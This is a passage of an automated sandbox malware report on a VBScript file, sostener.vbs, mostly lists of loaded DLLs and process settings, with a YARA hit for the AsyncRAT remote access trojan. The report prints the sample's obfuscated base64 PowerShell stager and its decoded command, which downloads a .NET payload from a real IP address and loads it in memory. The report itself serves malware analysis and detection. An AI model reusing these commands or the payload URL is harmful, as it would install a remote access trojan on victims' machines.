            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: sostener.vbsStatic file information: File size 1977486 > 1048576

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell $ExeNy = 'J?Bx?Gs?dgB3?HI?I??9?C??Jw?w?Cc?Ow?k?Gk?YQBx?HU?Yw?g", "0", "false");
            .NET source code contains potential unpacker
            Source: 3.2.powershell.exe.18506078440.1.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.1851cfd0000.4.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.18504da3b80.2.raw.unpack, Class1.cs.Net Code: ZxKHG System.AppDomain.Load(byte[])
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $ExeNy = 'J?Bx?Gs?dgB3?HI?I??9?C??Jw?w?Cc?Ow?k?Gk?YQBx?HU?Yw?g?D0?I??n?CU?c?B6?EE?YwBP?Gc?SQBu?E0?cg?l?Cc?OwBb?EI?eQB0?GU?WwBd?F0?I??k?Hk?dwBq?GQ?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??o?E4?ZQB3?C0?TwBi?Go?ZQBj?HQ?I?BO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?Ck?LgBE?G8?dwBu?Gw?bwBh?GQ?UwB0?HI?aQBu?Gc?K??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?Rg?z?GQ?b?Bs?C4?d?B4?HQ?Jw?p?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Hk?dwBq?GQ?a??p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?QwBs?GE?cwBz?Ew?aQBi?HI?YQBy?Hk?MQ?u?EM?b?Bh?HM?cw?x?Cc?KQ?u?Ec?ZQB0?E0?ZQB0?Gg?bwBk?Cg?JwBa?Hg?SwBI?Ec?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?d?B4?HQ?Lg?x?Eo?R??v?FM?VgBO?EU?LwB6?HI?YQBN?C8?ZwBl?FI?LwBr?GE?V??v?Dk?Ng?x?C4?Mw?z?DI?Lg?y?D??Mg?u?DE?OQ?v?C8?OgBw?HQ?d?Bo?Cc?I??s?C??J?Bp?GE?cQB1?GM?I??s?C??JwBS?Gc?dgB1?Ec?Jw?s?C??J?Bx?Gs?dgB3?HI?L??g?Cc?MQ?n?Cw?I??n?FI?bwBk?GE?Jw?g?Ck?KQ?7??==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;$global:?
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B890962 push E85E465Dh; ret 1_2_00007FFD9B8909F9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B890875 push E95E463Ch; ret 3_2_00007FFD9B890899

            Boot Survival

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
